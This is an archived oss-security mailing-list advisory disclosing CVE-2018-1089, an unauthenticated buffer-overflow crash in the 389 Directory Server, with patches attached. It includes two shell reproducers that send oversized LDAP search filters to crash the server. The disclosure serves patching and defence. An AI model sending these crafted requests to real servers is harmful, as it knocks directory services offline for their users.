Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 7 May 2018 17:35:30 +0200
From: Cedric Buissart <cbuissar@...hat.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2018-1089 389-ds-base: unauthenticated ns-slapd crash via
 large filter value in ldapsearch

On Mon, May 7, 2018 at 5:30 PM, Cedric Buissart <cbuissar@...hat.com> wrote:

> Hi all,
>
> This is to disclose the following flaw, CVE-2018-1089 :
>
> 389-ds-base, a.k.a 389 Directory Server, https://pagure.io/389-ds-base/,
> is a highly usable, fully featured, reliable and secure LDAP server
> implementation. It handles many of the largest LDAP deployments in the
> world.
>
> 389-ds server did not properly handle characters needed to be escaped in
> its query filter. This could result in buffer overflows, from the heap
> or the stack, on larger filters.  An unauthenticated attacker could send
> a specially crafted LDAP request and crash the server. RCE has not been
> demonstrated at this time.
>
> Red Hat would like to thank Greg Kubok for alerting us of the issue.
>
>
> Reproducer1 :
> [root@...ver1 ~]# payload=$(printf '.*$%.0s' {1..1000})
> [root@...ver1 ~]# ldapsearch -h localhost -p 389 -x -b "dc=blah"
> "(&(|(telephoneNumber=*${payload}*)(uid=*${payload}*)(
> title=*${payload}*)(sn=*${payload}*)(ou=*${payload}*)(
> givenName=*${payload}*))(objectClass=posixaccount))"
> "telephoneNumber sshpubkeyfp ipaSshPubKey uid krbCanonicalName title
> loginShell uidNumber gidNumber sn homeDirectory mail krbPrincipalName
> givenName nsAccountLock"
>
> Reproducer2:
> [root@...ver1 ~]# perl -e 'print ".*\$" x (1400)' | ldapsearch -x -f-
> "(&(uid=%s)(objectClass=posixaccount))"
>
>
> Patch attached for versions 1.3.7 & 1.2.11
>
Patches are now attached for real.

>
> Thanks!
>
> --
> Cedric Buissart,
> Product Security
>



-- 
Cedric Buissart,
Product Security

Content of type "text/html" skipped

View attachment "v1.3.7.5-CVE-2018-1089-Crash-from-long-search-filter.patch" of type "text/x-patch" (3369 bytes)

View attachment "v1.2.11.15-CVE-2018-1089-crash-in-long-search-filter.patch" of type "text/x-patch" (1549 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ